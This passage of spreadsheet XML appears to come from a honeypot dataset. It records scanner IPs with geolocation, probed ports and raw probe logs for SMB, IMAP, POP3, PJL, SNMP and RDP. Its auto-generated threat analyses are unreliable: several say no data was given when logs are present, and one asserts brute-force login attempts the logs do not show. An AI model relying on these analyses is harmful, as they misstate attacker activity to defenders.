(178.54.78.190,63495)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,57699)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,57835)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,52654)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,52704)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,61220)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,61289)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,59194)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,59275)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,65149)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,65318)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,63304)}</t>
  </si>
  <si>
    <t>::ffff:b236:4ebe</t>
  </si>
  <si>
    <t>c15ef3a9dd28cab32b60bde0b03f23fc</t>
  </si>
  <si>
    <t>186.193.176.3</t>
  </si>
  <si>
    <t>186-193-176-3.jupiter.com.br&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H37&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;24219&amp;&amp;445&amp;&amp;1433&amp;&amp;4879&amp;&amp;NA</t>
  </si>
  <si>
    <t>BR</t>
  </si>
  <si>
    <t>Brazil</t>
  </si>
  <si>
    <t>MA</t>
  </si>
  <si>
    <t>Maranhão</t>
  </si>
  <si>
    <t>Imperatriz</t>
  </si>
  <si>
    <t>3398269</t>
  </si>
  <si>
    <t>-5.52639</t>
  </si>
  <si>
    <t>-47.4917</t>
  </si>
  <si>
    <t>28191</t>
  </si>
  <si>
    <t>Jupiter Telecomunicacoes e Informatica Ltda</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,59987)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,60048)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,63000)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,63324)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,50216)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,50295)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,56312)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,63083)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,63181)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,55447)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,55968)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,49431)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,49517)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,53104)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,53280)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,63628)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,51709)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,63932)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,63979)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,51641)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,51889)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,51453)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,51658)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,60208)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,58774)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,54693)}</t>
  </si>
  <si>
    <t>::ffff:bac1:b003</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze malicious activity. 
There is insufficient information to determine any malicious activity or potential threat. 
Cannot proceed with analysis without actual log data. &amp;&amp; An incoming network connection from an unknown IP address is attempting to connect to a SMB share on the system. This could be a scanning or probing activity by malicious software. The intention may be unauthorized access or data exfiltration. &amp;&amp; Possible malicious activity involves an incoming connection from a suspicious IP address attempting to access a shared resource on the network for unauthorized purposes. The connection is initiated by an external entity with a specific port number. This could be an attempt at exploiting vulnerable services or accessing sensitive data without authorization.</t>
  </si>
  <si>
    <t>SMB Scanning &amp;&amp; SMB Scan</t>
  </si>
  <si>
    <t>19455057b27141797641ff38c21748fd</t>
  </si>
  <si>
    <t>194.238.27.137</t>
  </si>
  <si>
    <t>vmi2292403.contaboserver.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>1433&amp;&amp;445&amp;&amp;NA</t>
  </si>
  <si>
    <t>MO</t>
  </si>
  <si>
    <t>Missouri</t>
  </si>
  <si>
    <t>St. Louis</t>
  </si>
  <si>
    <t>St Louis</t>
  </si>
  <si>
    <t>4407066</t>
  </si>
  <si>
    <t>63101</t>
  </si>
  <si>
    <t>38.627</t>
  </si>
  <si>
    <t>-90.1994</t>
  </si>
  <si>
    <t>40021</t>
  </si>
  <si>
    <t>Nubes, LLC</t>
  </si>
  <si>
    <t>Contabo GmbH</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (194.238.27.137,65349)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (194.238.27.137,65437)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (194.238.27.137,57398)}&amp;&amp;{Data_SMB:Incoming connection (194.238.27.137,57471)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (194.238.27.137,65134)}&amp;&amp;{Data_SMB:Incoming connection (194.238.27.137,65171)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:c2ee:1b89</t>
  </si>
  <si>
    <t>11f2510a1e8f02bd306d2c8f908ea69a</t>
  </si>
  <si>
    <t>179.0.51.193</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H10</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;61283&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>RJ</t>
  </si>
  <si>
    <t>Rio de Janeiro</t>
  </si>
  <si>
    <t>Duque de Caxias</t>
  </si>
  <si>
    <t>Vila Sarapui</t>
  </si>
  <si>
    <t>12420851</t>
  </si>
  <si>
    <t>-22.7518</t>
  </si>
  <si>
    <t>-43.2988</t>
  </si>
  <si>
    <t>271415</t>
  </si>
  <si>
    <t>S3 Net Soluções Inteligentes Ltda</t>
  </si>
  <si>
    <t>connection&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b300:33c1</t>
  </si>
  <si>
    <t>medium&amp;&amp;low</t>
  </si>
  <si>
    <t>05ecb4922f94de60256940b1261b42b9</t>
  </si>
  <si>
    <t>45.156.129.60</t>
  </si>
  <si>
    <t>NA&amp;&amp;sh-chi-us-gp1-wk101a.internet-census.org</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_SNMP_H8&amp;&amp;SMA-LAB_PJL_H37&amp;&amp;SMA-LAB_IRC_H38&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_LDAP_H30&amp;&amp;SMA-LAB_POP3_H44&amp;&amp;SMA-LAB_ORACLE_H8&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_SIP_H12&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_DNS_H46&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_PJL_H19&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_REDIS_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;110&amp;&amp;161&amp;&amp;9100&amp;&amp;6667&amp;&amp;80&amp;&amp;389&amp;&amp;1521&amp;&amp;23&amp;&amp;143&amp;&amp;3306&amp;&amp;21&amp;&amp;5060&amp;&amp;389&amp;&amp;53&amp;&amp;5900&amp;&amp;1080&amp;&amp;6379&amp;&amp;30071&amp;&amp;443&amp;&amp;5432&amp;&amp;445&amp;&amp;NA&amp;&amp;3389&amp;&amp;26137</t>
  </si>
  <si>
    <t>Illinois</t>
  </si>
  <si>
    <t>Cook</t>
  </si>
  <si>
    <t>Chicago</t>
  </si>
  <si>
    <t>4887398</t>
  </si>
  <si>
    <t>60666</t>
  </si>
  <si>
    <t>41.8781</t>
  </si>
  <si>
    <t>-87.6298</t>
  </si>
  <si>
    <t>Inap CHI</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;request&amp;&amp;login&amp;&amp;NA&amp;&amp;stshash&amp;&amp;query&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'OECJ0'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SMB:Incoming connection (45.156.129.60,52908)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=45.156.129.60;rport=55893'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.113.68.70', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
@PJL INFO ID_x000D_
@PJL INFO PRODINFO_x000D_
'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 109.123.229.33:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (45.156.129.60,38630)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
@PJL INFO ID_x000D_
@PJL INFO PRODINFO_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.42.176:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'KODH0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'PJHL0'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
@PJL INFO ID_x000D_
@PJL INFO PRODINFO_x000D_
'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:2d9c:813c</t>
  </si>
  <si>
    <t>There is insufficient log data provided for analysis. &amp;&amp; No LDAP login attempt was detected, suggesting that an attacker did not try to access the system using a valid or invalid username. This could be due to a failed attack or lack of activity against this service. The absence of a login attempt is unusual in this context. &amp;&amp; No log data provided. &amp;&amp; No data provided, cannot analyze.</t>
  </si>
  <si>
    <t>I need to see some log data to analyze! Please provide the data, and I'll be happy to help you identify the types of attacks.</t>
  </si>
  <si>
    <t>aaa900825d704997dec07233907e1ce3</t>
  </si>
  <si>
    <t>45.156.129.87</t>
  </si>
  <si>
    <t>NA&amp;&amp;sh-chi-us-gp1-wk135c.internet-census.org</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Email Spoofing</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_SNMP_H44&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_ORACLE_H6&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_IRC_H24&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_FTP_H36&amp;&amp;SMA-LAB_POSTGRES_H15&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_POP3_H30&amp;&amp;SMA-LAB_POP3_H43&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_TELNET_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5432&amp;&amp;23&amp;&amp;9100&amp;&amp;161&amp;&amp;1521&amp;&amp;389&amp;&amp;5900&amp;&amp;6667&amp;&amp;6379&amp;&amp;16166&amp;&amp;110&amp;&amp;3306&amp;&amp;NA&amp;&amp;21</t>
  </si>
  <si>
    <t>{'dnsbl-2.uceprotect.net': ['unknown']}</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;NA&amp;&amp;command</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
@PJL INFO ID_x000D_
@PJL INFO PRODINFO_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 103.211.202.140:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:{'command': 'SSH-2.0-Go_x000D_
'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.2.0 1.3.6.1.2.1.1.3.0 1.3.6.1.2.1.1.4.0 1.3.6.1.2.1.1.5.0 1.3.6.1.2.1.1.6.0 1.3.6.1.2.1.1.7.0', 'version': '1'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 45.14.244.111:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
@PJL INFO ID_x000D_
@PJL INFO PRODINFO_x000D_
'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 154.26.156.60:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:2d9c:8157</t>
  </si>
  <si>
    <t>No log data provided. &amp;&amp; No activity detected for POP3 service, suggesting potential probing or scanning attempt to exploit service vulnerability. 
Activity is likely reconnaissance or exploration of system to identify vulnerable services.
System administrators should review network logs and firewall settings to prevent unauthorized access. &amp;&amp; This log indicates an attempt to initiate a secure connection for POP3 email protocol, which is often used by malicious actors to cover their tracks or send spam emails. The action suggests an external threat actor probing for vulnerabilities or attempting to establish unauthorized access. This behavior may be indicative of reconnaissance activity leading to potential data exfiltration. &amp;&amp; This suggests an attempt to initiate a secure connection for POP3 protocol, which may be a precursor to unauthorized access or exploitation of the service. The use of 'STLS' command is unusual and could indicate malicious intent. This activity might be related to scanning or probing for vulnerabilities in the POP3 service. &amp;&amp; The log suggests a potential scanning or probing activity, possibly an attempt to identify open ports or services on the system. This could be a prelude to further malicious actions if successful. The absence of Data_PJL may indicate evasion techniques used by the attacker. &amp;&amp; A GET request is being sent to a server with a suspicious IP address and port number, indicating potential scanning or probing activity for vulnerabilities. The User-Agent header suggests the request is coming from a browser, but its authenticity is unclear. This may be an attempt to identify weaknesses in web servers. &amp;&amp; An unknown user agent is accessing a server at IP address 154.26.156.60 on port 9100, indicating potential scanning or reconnaissance activity.
The request appears to be a basic HTTP GET request for the root directory of the server.
This could be an attempt to gather information about the targeted system's configuration and services. &amp;&amp; No log data provided, unable to analyze. &amp;&amp; This data indicates that SNMP (Simple Network Management Protocol) scans or probes were detected, potentially indicating reconnaissance activity by malicious actors. 
The absence of any specific host information suggests the activity was likely a broad scan rather than a targeted attack.
No further information is available regarding the source or nature of the scanning activity due to NA (not applicable) in Data_SNMP field. &amp;&amp; This log indicates possible brute force attacks on an account, as it shows repeated failed login attempts within a short timeframe.
The attacker is likely trying to guess or crack the password of this account.
This could be an attempt to gain unauthorized access to sensitive information.</t>
  </si>
  <si>
    <t>POP3 Scan &amp;&amp; TLS Attack &amp;&amp; SSL Scan &amp;&amp; Nmap Scan</t>
  </si>
  <si>
    <t>54ce1e5ae033a801a736676335112394</t>
  </si>
  <si>
    <t>45.156.128.66</t>
  </si>
  <si>
    <t>sh-ams-nl-gp1-wk114a.internet-census.org&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_POSTGRES_H38&amp;&amp;SMA-LAB_POSTGRES_H21&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_IRC_H39&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_MYSQL_H32&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_POP3_H46&amp;&amp;SMA-LAB_SNMP_H22&amp;&amp;SMA-LAB_PJL_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5432&amp;&amp;10742&amp;&amp;1521&amp;&amp;3306&amp;&amp;3389&amp;&amp;15593&amp;&amp;6667&amp;&amp;80&amp;&amp;6379&amp;&amp;23&amp;&amp;9100&amp;&amp;39997&amp;&amp;29770&amp;&amp;110&amp;&amp;161&amp;&amp;389&amp;&amp;445&amp;&amp;NA&amp;&amp;443&amp;&amp;143&amp;&amp;21&amp;&amp;24643&amp;&amp;13257&amp;&amp;5900&amp;&amp;10172</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;login&amp;&amp;NA&amp;&amp;query&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (45.156.128.66,53448)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'ELGA0'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'BDCK0'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1 _x000D_
_x000D_
'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.37.11', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'NGBJ0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'CDKP0'}}&amp;&amp;{Data_SMB:Incoming connection (45.156.128.66,37108)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'PCAG0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'DKHJ0'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.2.0 